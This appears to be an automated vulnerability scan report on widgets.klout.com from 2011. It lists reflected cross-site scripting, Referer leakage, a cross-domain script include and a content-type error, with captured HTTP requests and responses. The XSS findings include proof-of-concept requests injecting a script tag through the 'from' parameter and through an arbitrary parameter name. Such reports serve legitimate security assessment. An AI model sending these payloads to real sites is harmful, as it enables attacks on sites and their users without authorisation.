1. Cross-site scripting (reflected)
1.1. http://widgets.klout.com/ [from parameter]
1.2. http://widgets.klout.com/ [name of an arbitrarily supplied request parameter]
2. Cross-domain Referer leakage
3. Cross-domain script include
4. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://widgets.klout.com |
Path: | / |
GET /?from=ks99f63"><script>alert(1)< Host: widgets.klout.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56 |
HTTP/1.1 200 OK Date: Sat, 23 Jul 2011 14:53:07 GMT Server: Apache/2.2.16 (Ubuntu) X-Powered-By: PHP/5.3.3-1ubuntu9.5 Vary: Accept-Encoding Content-Length: 17995 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Bringing Influen ...[SNIP]... <a href="http://klout.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://widgets.klout.com |
Path: | / |
GET /?from=ks&a7db0"><script>alert(1)< Host: widgets.klout.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56 |
HTTP/1.1 200 OK Date: Sat, 23 Jul 2011 14:53:07 GMT Server: Apache/2.2.16 (Ubuntu) X-Powered-By: PHP/5.3.3-1ubuntu9.5 Vary: Accept-Encoding Content-Length: 18001 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Bringing Influen ...[SNIP]... <a href="http://klout.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://widgets.klout.com |
Path: | / |
GET /?from=ks HTTP/1.1 Host: widgets.klout.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56 |
HTTP/1.1 200 OK Date: Sat, 23 Jul 2011 14:53:01 GMT Server: Apache/2.2.16 (Ubuntu) X-Powered-By: PHP/5.3.3-1ubuntu9.5 Vary: Accept-Encoding Content-Length: 17909 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Bringing Influen ...[SNIP]... </script> <script src="http://ajax <script src="http://ajax ...[SNIP]... </a> and <a href="http://codex ...[SNIP]... </script> <script type="text/javascript" src="http://edge <noscript> <img src="http://pixel </noscript> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://widgets.klout.com |
Path: | / |
GET /?from=ks HTTP/1.1 Host: widgets.klout.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56 |
HTTP/1.1 200 OK Date: Sat, 23 Jul 2011 14:53:01 GMT Server: Apache/2.2.16 (Ubuntu) X-Powered-By: PHP/5.3.3-1ubuntu9.5 Vary: Accept-Encoding Content-Length: 17909 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Bringing Influen ...[SNIP]... </script> <script src="http://ajax <script src="http://ajax ...[SNIP]... </script> <script type="text/javascript" src="http://edge ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://widgets.klout.com |
Path: | /public/scripts/widget |
GET /public/scripts/widget Host: widgets.klout.com Proxy-Connection: keep-alive Referer: http://widgets.klout.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56 |
HTTP/1.1 200 OK Date: Sat, 23 Jul 2011 14:53:03 GMT Server: Apache/2.2.16 (Ubuntu) X-Powered-By: PHP/5.3.3-1ubuntu9.5 Vary: Accept-Encoding Content-Length: 4692 Connection: close Content-Type: text/html; charset=UTF-8 (function(){ this.static = ["business","sample ...[SNIP]... |